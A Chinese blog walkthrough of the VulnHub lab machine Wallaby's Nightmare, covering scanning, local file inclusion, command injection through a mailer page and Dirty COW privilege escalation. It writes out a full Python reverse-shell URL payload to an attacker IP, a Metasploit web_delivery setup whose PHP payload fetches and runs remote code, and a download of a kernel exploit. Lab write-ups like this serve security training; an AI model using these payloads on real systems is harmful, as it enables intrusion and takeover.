vulnhub靶场,WALLABY‘S: NIGHTMARE (V1.0.2)

最新推荐文章于 2024-05-13 09:48:33 发布
最新推荐文章于 2024-05-13 09:48:33 发布
阅读量3.6k 收藏 1
点赞数
分类专栏: 靶场实战 文章标签: 命令执行 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/121698124
版权

vulnhub靶场,WALLABY’S: NIGHTMARE (V1.0.2)

环境准备

靶机下载地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/
攻击机:kali(192.168.109.128)
靶机:WALLABY’S: NIGHTMARE (V1.0.2)(192.168.109.187)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.187
使用nmap扫描查看目标靶机端口开放情况

开放端口:22、80
浏览器访问目标靶机80端口

这里要你输入一个姓名去打这次CTF

点击Start the CTF!

这里说什么我在渗透他的服务器,并且在监视我,查看这个url发现可能存在LFI
http://192.168.109.187/?page=../.././../etc/passwd

确实存在LFI,但是尝试包含日志文件失败,漏洞不能得到有效利用
使用nikto进行扫描

nikto -host http://192.168.109.187/


没有发现什么,当时发现再次访问上面那个链接竟然显示网站不存在了

what?
再次使用nmap进行扫描

可以看到目标关闭了80端口,而在60080端口开启了http服务
使用浏览器访问目标靶机的60080端口

这里说为了防止我攻击,换了另一个港口,说明之前的?page页面应该还在,访问试试

对?page页面进行目录扫描

发现mailer页面

查看源代码

发现这里存在RCE,进行验证
http://192.168.109.187:60080/?page=mailer&mail=ls

渗透过程

这里可以使用python进行反弹shell

kali:nc -lvvp 4444
目标靶机:http://192.168.109.187:60080/?page=mailer&mail=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


这里也可以使用另一种方法

use exploit/multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.109.128
set lport 8888
exploit


目标靶机上

http://192.168.109.187:60080/?page=mailer&mail=php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.109.128:8080/taXS3RI6xGsLgOY%27,%20false,%20stream_context_create([%27ssl%27=%3E[%27verify_peer%27=%3Efalse,%27verify_peer_name%27=%3Efalse]])));%22

提权

查看目标靶机信息

这里可以使用脏牛提权
将exp下载到本地

wget https://gist.githubusercontent.com/rverton/e9d4ff65d703a9084e85fa9df083c679/raw/9b1b5053e72a58b40b28d6799cf7979c53480715/cowroot.c


进行编译

gcc cowroot.c -o exp -pthread


给予执行权限

chmod +x exp

运行exp进行提权

切换至其root目录,成功获得flag,靶机vulnhub靶场,WALLABY’S: NIGHTMARE (V1.0.2)渗透结束

super 硕
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
小白的靶机VulnHub-Wallaby‘s: Nightmare (v1.0.2)
wo41ge的博客
02-13 1万+
靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 开机界面就是这样 还是 采用的桥接模式 确定靶机的IP地址:192.168.1.10 靶机开放了22、80端口 直接访问 随意输入一个用户名 看这个参数 /?page= 之前总结过 直接/etc/passwd 上nikto扫扫 被拒绝了请求 我淦 重新扫描一下 发现80端口关闭了。。。 但是60080端口开启了http服务 继续扫目录 有很多的目录 一个一个看一下
test-wallaby:试用Wallaby.js测试运行程序
04-28
测试袋鼠 配置了示例Jest + TypeScript项目 资源 档案文件 显示了Jest + TypeScript的节点配置 覆盖范围 执行期间覆盖的测试行,...启动Wallaby时,请确保查看其输出。 它将在那里显示可能的错误(以及解决方案!)
No.34-VulnHub-Wallaby's: Nightmare (v1.0.2)-Walkthrough渗透学习
qq_34801745的博客
01-28 934
** VulnHub-Wallaby’s: Nightmare (v1.0.2)-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/wallabys-nightmare-v102,176/ 靶机难度:中级(CTF) 靶机发布日期:2016年12月22日 靶机描述: 这是我的第一台boot2root机器。这是初学者的中级水平。 它已经在VBox和VM...
【甄选靶场Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
人间体佐菲的博客
10-07 683
【甄选靶场Vulnhub百个项目渗透——项目三十四:wallabysnightmare1.0.2(LFI,irc提权)
vulnhub渗透日记20:Wallaby‘s: Nightmare (v1.0.2)
ericalezl的博客
08-01 83
⏰时间:2023.8.1🗺️靶机地址: https://download.vulnhub.com/wallabys/wallabysnightmare102.rar⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
探索Wallaby:优雅的Web应用自动化测试框架
最新发布
gitblog_00094的博客
05-13 618
探索Wallaby:优雅的Web应用自动化测试框架 项目地址:https://gitcode.com/elixir-wallaby/wallaby 在软件开发中,确保代码质量是至关重要的一步,而有效的自动化测试则是实现这一目标的关键工具。Wallaby 是一个由Elixir编写的强大测试库,专为模拟真实的用户交互进行Web应用程序测试设计。它以其简单易用和并发测试的能力脱颖而出,使得编写和维护测...
atom-wallaby:Wallaby.js Atom包启动器
05-02
Wallaby.js是开发人员生产力工具,可在您键入时立即运行JavaScript和TypeScript测试,并在您的IDE旁边的代码旁边突出显示结果。 快速链接 。 。 。 请注意, ,在免费试用期过后需要许可证。
article-wallaby:有关小袋鼠的文章的存储库
05-08
**小袋鼠文章存储库——探索Wallaby.js与JavaScript测试** Wallaby.js是一款高效、实时的JavaScript测试运行器,专为提升开发者的测试体验而设计。这个名为"article-wallaby"的存储库是为了演示如何利用Wallaby.js...
公开:wallaby.js问题的存储库
02-04
**wallaby.js问题存储库详解** `wallaby.js` 是一个强大的自动化测试工具,专为JavaScript和TypeScript开发者设计,支持快速、持续的单元测试和集成测试。它可以在开发过程中实时运行测试,提供即时反馈,从而提升...
wallaby-coffeescript-sample:使用wallaby.js测试CoffeeScript应用程序
05-11
本篇文章将深入探讨如何使用Wallaby.js来测试CoffeeScript应用程序,以及它在`wallaby-coffeescript-sample-master`项目中的应用。 首先,让我们理解CoffeeScript。CoffeeScript是一种简洁、易读的编程语言,它编译...
vulnhub靶场,RED: 1
kukudeshuo的博客
02-11 4376
vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.197
vulnhub靶场,SICKOS: 1.1
kukudeshuo的博客
12-07 4232
vulnhub靶场,SICKOS: 1.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 攻击机:kali(192.168.109.128) 靶机:SICKOS: 1.1(192.168.109.189) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.189 使用nmap扫描查看目标
vulnhub靶场,XXE LAB: 1
kukudeshuo的博客
01-17 2410
vulnhub靶场,XXE LAB: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 攻击机:kali(192.168.109.128) 靶机:XXE LAB: 1(192.168.109.195) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:通过各种手段找到flag 信息收集 使用arp-scan-l确定目标靶机IP 确定目标靶机IP为192.168.109
vulnhub靶场,JANGOW: 1.0.1
kukudeshuo的博客
02-17 1834
vulnhub靶场,JANGOW: 1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/ 攻击机:kali(192.168.109.128) 靶机:JANGOW: 1.0.1(192.168.109.198) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机
vulnhub靶场,CORROSION: 1
kukudeshuo的博客
01-10 1790
vulnhub靶场,CORROSION: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 攻击机:kali(192.168.109.128) 靶机:CORROSION: 1(192.168.109.192) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192
vulnhub靶场,Raven2
kukudeshuo的博客
07-19 1497
vulnhub靶场,Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机:Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
vulnhub靶场,Bob_v1.0.1
kukudeshuo的博客
08-27 946
vulnhub靶场,Bob_v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bob-101,226/ 攻击机:kali(192.168.109.128) 靶机:Bob_v1.0.1(192.168.109.172) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP地址为192.168.109.172 使用nmap扫描查看目标靶机
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 914
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机:WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
OpenStack Wallaby 安装指南概览
“openstack-wallaby-InstallGuide.pdf”是一份OpenStack Wallaby版本的安装指南,由OpenStack贡献者编写,发布于2021年6月23日。这份文档详细介绍了OpenStack的安装流程、基础概念、架构、示例环境、安全配置、网络...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值